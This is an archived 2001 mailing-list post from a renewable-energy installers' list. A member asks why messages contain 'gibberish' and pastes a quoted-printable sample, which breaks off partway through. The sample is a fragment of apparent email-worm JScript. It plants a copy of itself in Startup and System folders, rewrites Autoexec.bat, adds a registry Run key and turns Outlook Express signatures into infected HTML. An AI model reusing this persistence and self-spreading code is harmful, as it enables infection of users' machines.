viruse concern [RE-wrenches]
carl reuter
creuter at rocketmail.com
Sat Feb 10 12:09:31 PST 2001
Funny this subject should appear because I was looking at the latest
posting s from the group while at a friends house who happens to work
for Netscape and asked him to explain why so much of the messages
contained unreadable gibberish to my untrained eye and the one
section I showed him contained something about autoexecbat that he
said was a commonly used means of a hacker to try and enter another
persons system through the mail via outlook express just as one of
you mentioned concerning worms. I read my mail through a web based
email reader so that danger doesnt concern me but its annoying to
have to sift all the extra non pertinent stuff out . Apparently the
stuff thats being generated in HTML can be turned off but I havent
found that option in Yahoomail and apologize If my postings are
sending that. I have no idea what it looks like at anyone elses site
but I'll see long strings of code after the header says that part of
the message is in MIME format. I sent the whole last posting to my
buddy for analysis and if anything interesting comes of it I'll
forward it. Heres a sample of what I've been seeing.The tenth line
down containing Autoexec.bat was the part my friend was concerned
about. Forgive my ignorance if this is all standard stuff. Carl
Reuter
mye=3Dnew =
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew
=
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\=
\\StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists=
(kfr))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.Fil=
eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
.GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
)?wd+'MENUD=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('=
@echo off>'+pth);t1.WriteLine('del =
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\Identities\\\\'+id=
n+'\\\\Software\\\\Microsoft\\\\Outlook =
Express\\\\5.0';sg=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
"Default =
Signature\"=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
\\00000000]');t2.WriteLine('\"name\"=3D\"Signature =
#1\"');t2.WriteLine('\"type\"=3Ddword:00000002');t2.WriteLine('\"text\"=3D=
\"\"');t2.Write('\"file\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.Wri=
teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
L_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]')=
;t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.h=
ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><B=
ODY><DIV
=====
Land and Sea Solar, Renewable Energy Systems. Email: carl at landandseasolar.com. Phone:831-252-5040 website:http://www.landandseasolar.com
__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail - only $35
a year! http://personal.mail.yahoo.com/
- - - - - - -
To send a message:
RE-wrenches at topica.com
The archive of previous messages:
http://www.topica.com/lists/RE-wrenches/
To unsubscribe send a message to:
RE-wrenches-unsubscribe at topica.com
To check out the other RE-Wrench participants:
www.mrsharkey.com/wrenches/index.html
Hosted by Home Power magazine:
www.homepower.com
For info contact list moderator by email:
michael.welch at homepower.com
____________________________________________________________
T O P I C A -- Learn More. Surf Less.
Newsletters, Tips and Discussions on Topics You Choose.
http://www.topica.com/partner/tag01
More information about the RE-wrenches
mailing list